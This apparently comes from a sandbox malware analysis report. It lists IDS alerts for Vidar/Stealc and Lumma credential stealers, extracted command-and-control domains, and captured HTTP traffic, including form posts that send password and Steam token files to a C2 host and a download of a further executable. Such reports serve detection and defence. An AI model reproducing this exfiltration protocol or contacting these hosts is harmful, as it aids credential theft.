Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 141.98.233.156:80 -> 192.168.2.4:49745
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 141.98.233.156:80 -> 192.168.2.4:49745
Source: Network traffic Suricata IDS: 2056394 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) : 192.168.2.4:63578 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056402 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) : 192.168.2.4:53531 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056392 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) : 192.168.2.4:52021 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) : 192.168.2.4:60166 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056406 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) : 192.168.2.4:63119 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056400 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) : 192.168.2.4:54848 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056410 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) : 192.168.2.4:63998 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:57018 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2056408 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) : 192.168.2.4:58481 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:57019 -> 104.21.93.202:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:57019 -> 104.21.93.202:443
Source: Malware configuration extractor URLs: soldiefieop.site
Source: Malware configuration extractor URLs: chorusarorp.site
Source: Malware configuration extractor URLs: absorptioniw.site
Source: Malware configuration extractor URLs: questionsmw.stor
Source: Malware configuration extractor URLs: treatynreit.site
Source: Malware configuration extractor URLs: abnomalrkmu.site
Source: Malware configuration extractor URLs: mysterisop.site
Source: Malware configuration extractor URLs: snarlypagowo.site
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199780418869
Source: global traffic TCP traffic: 192.168.2.4:57012 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:26 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:32 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:32 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:33 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:33 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:34 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:34 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:42 GMTContent-Type: application/octet-streamContent-Length: 539688Last-Modified: Fri, 04 Oct 2024 07:45:44 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ff9d28-83c28"X-Content-Type-Options: nosniffAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECFHost: proxy.johnmccrea.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="hwid"49C3D87310A02740725608-a33c7340-61ca------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------JEHIJJKEGHJJKECBKECF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="mode"1------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="mode"2------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: proxy.johnmccrea.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="mode"21------DAFHIDGIJKJKECBGDBGH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: proxy.johnmccrea.comContent-Length: 6757Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //sql.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAKHost: proxy.johnmccrea.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: proxy.johnmccrea.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: proxy.johnmccrea.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_data"------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: proxy.johnmccrea.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="file_data"------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic HTTP traffic detected: GET //freebl3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //mozglue.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //msvcp140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //softokn3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //vcruntime140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //nss3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: proxy.johnmccrea.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="mode"3------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="mode"4------FIECBFIDGDAKFHIEHJKF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEHost: proxy.johnmccrea.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 71 4e 45 34 4d 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="file_data"qNE4Mg==------DHIECGCAEBFIIDHIDGIE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: proxy.johnmccrea.comContent-Length: 114021Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="mode"5------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: playd.healthnlife.pkCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: proxy.johnmccrea.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 37 32 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="mode"51------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="task_id"1272547------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="status"1------KJDHCAFCGDAAKEBFIJDG--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="mode"6------IJKJDAFHJDHIEBGCFIDB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: cowod.hopto.orgContent-Length: 5777Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 147.45.44.104 147.45.44.104
Source: Joe Sandbox View IP Address: 45.132.206.251 45.132.206.251
Source: Joe Sandbox View ASN Name: CH-NET-ASRO CH-NET-ASRO
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: LIFELINK-ASRU LIFELINK-ASRU
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:57015 -> 147.45.44.104:80
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beearvagueo.site
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 2.23.198.32
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
